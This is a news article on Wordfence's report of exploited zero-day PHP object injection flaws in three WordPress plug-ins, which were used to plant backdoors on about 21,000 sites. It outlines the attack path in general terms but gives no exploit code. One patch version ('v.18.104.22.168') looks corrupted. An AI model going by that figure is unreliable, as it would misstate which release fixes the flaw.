Vulnerabilities found in three different plug-ins have affected an estimated 21000 WordPress sites.
Zero-day vulnerabilities have always been a benefit for cybercriminals as these have allowed them numerable times to exploit vulnerabilities in order to hack websites or devices. This time, they targeted the popular website building platform, WordPress.
The security firm, Wordfence, recently reported that three different WordPress plug-ins with zero-day vulnerabilities were recently exploited and affected thousands of websites. Since the report, the attack vector has been fixed and WordPress has released updates to address the vulnerable plug-ins.
Notably, the malicious culprit was a PHP object injection vulnerability, which affected the plug-ins in a similar manner. Wordfence picked up on the vulnerabilities during a routine site cleaning service. During this particular clean, the security firm discovered several hacked websites where they immediately suspected that exploited plug-ins could be the cause.
At closer inspection, it was revealed that the exploited plug-ins also generated a malicious file on victims’ websites, while logs merely showed POST request to /wp-admin/admin-ajax.php.
Since the discovery, Wordfence captured the attacks in their threat database. Wordfence’s lead developer, Matt Barry, reconstructed the exploits and immediately put new WAF rules in place in order to block the exploits. The new rules were then sent to all WordPress premium users so as to ensure their protection from the exploited plug-ins. Plug-in authors were also notified of the available updates.
The affected plug-ins included: WPMU Dev’s Appointments (fixed in v.2.2.2), Dan Coulter’s Flickr Gallery (fixed in v.1.5.3), and CMSHelpLive’s RegistrationMagic-Custom Registration Forms (fixed in v.18.104.22.168).
In their advisory post, Wordfence explained that the exploited vulnerabilities allowed hackers to install backdoors on WordPress websites. Users have since been warned to exercise caution when installing a new plug-in.
The number of affected websites is estimated at 21 000. The surprisingly low number has been attributed to the affected plug-ins not being widely popular. Despite the low number, Wordfence still issued a warning to all WordPress users.
According to the CVSSv3 severity scale, the zero-day vulnerabilities reached a score of 9.8/10, which officially makes it of a critical nature.
Brad Haas, a researcher at Wordfence, stated that the exploited vulnerability allowed attackers to force a website to “fetch a remote file” which was discovered to be a PHP backdoor. After the backdoor was installed, hackers could store the file in the desired location.
According to Haas exploiting this vulnerability did not require a lot of skill on the part of the hackers. To exploit the vulnerability, a hacker simply has to package the exploit within an HTTP Post request which is then sent to the targeted website. After this process, there is no further need for additional authentication. Another alarming aspect is the fact that hackers can easily perform reverse engineering within the plug-ins’ changelogs to ‘deduce’ to successfully exploit the code.
Websites that run on Flickr Gallery plugin are particularly vulnerable as they can be exploited by targeting their root URL. The other two affected plug-ins require the hacker to take aim at the POST request at the admin-ajax.php file. Once the hacker has successfully installed the backdoor they can infiltrate the website easily and quickly.